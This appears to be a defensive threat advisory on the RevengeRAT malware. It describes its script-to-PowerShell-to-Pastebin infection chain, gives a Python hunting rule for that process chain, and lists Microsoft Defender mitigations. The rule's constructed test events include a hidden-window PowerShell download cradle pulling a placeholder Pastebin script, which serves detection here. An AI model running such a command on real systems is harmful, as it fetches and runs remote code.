Threat behavior
RevengeRAT, or Revenge, is a malware family used by multiple operators. It shares code and behavior similarities, as well as tactics, techniques, and procedures (TTPs), with other publicly available RAT campaigns such as AsyncRAT, QuasarRAT, WSHRat, LimeRAT, Netwire, Cybergate, Vjw0rm, and ClipBanker, and several others that are currently unnamed.
Once the user downloads the VB script, it launches with the wscript.exe process. The VB script then launches a PowerShell script, which in turn connects to a Pastebin site and downloads a second-stage script SysTray.PS. This script initiates additional processes to maintain persistence, collect data, and then connect to the attacker’s command-and-control (C2) server to exfiltrate data from the target device.
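The delivery chain above (a script host launching PowerShell that fetches a second stage from Pastebin) is a good hunting target on process-creation telemetry. The following is an added example, not Microsoft's code or the RevengeRAT sample itself; the event fields and the sample events are constructed and hypothetical, not the Defender schema.

```python
"""Flag the wscript.exe -> powershell.exe -> pastebin.com chain in
process-creation events. Field names and sample records are CONSTRUCTED
for this example and do not correspond to any real product schema."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name only, e.g. "wscript.exe"
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Any pastebin.com URL (raw or normal paste), case-insensitive.
PASTEBIN_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.IGNORECASE)


def find_suspicious_chains(events):
    """Return (script_host_event, powershell_event) pairs where a script host
    spawned PowerShell whose command line references Pastebin."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image.lower() not in SCRIPT_HOSTS:
            continue
        if PASTEBIN_RE.search(e.cmdline):
            hits.append((parent, e))
    return hits


# Constructed sample events: one malicious chain plus two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", 'wscript.exe "C:\\Users\\u\\Downloads\\invoice.vbs"'),
    ProcEvent(300, 200, "powershell.exe",
              "powershell.exe -w hidden -c (New-Object Net.WebClient)"
              ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
    # Benign: PowerShell started from the desktop shell, not a script host.
    ProcEvent(400, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    # Script host -> PowerShell without a Pastebin reference; not flagged here.
    ProcEvent(500, 200, "powershell.exe", "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for parent, child in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"ALERT: {parent.image} (pid {parent.pid}) -> {child.image} "
              f"(pid {child.pid}): {child.cmdline}")
```

Tuning note: the plain "script host spawns PowerShell" relationship (pid 500 above) is itself worth a lower-severity rule, since the second stage need not come from Pastebin.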
Prevention
Guidance for individual users
Keep your operating system and antivirus products up to date. Customers who have turned on automatic updates do not need to take additional action.
Take these steps to help prevent malware infection on your computer.
Guidance for enterprise administrators and Microsoft 365 Defender customers
Ransomware more often attacks enterprises than individuals. Following the mitigation steps below, together with the steps to help prevent malware infection on your computers, can help prevent ransomware attacks.
Microsoft recommends the following mitigations to reduce the impact of this activity:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Defender for Office 365 customers should ensure that Safe Attachments and Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
  - Block process creations originating from PsExec and WMI commands – Some organizations might experience compatibility issues with this rule on certain server systems but should deploy it to other systems to prevent lateral movement originating from PsExec and WMI, including Impacket’s WMIexec.
  - Block executable files from running unless they meet a prevalence, age, or trusted list criterion.
  - Use advanced protection against ransomware.
  - Block all Office applications from creating child processes.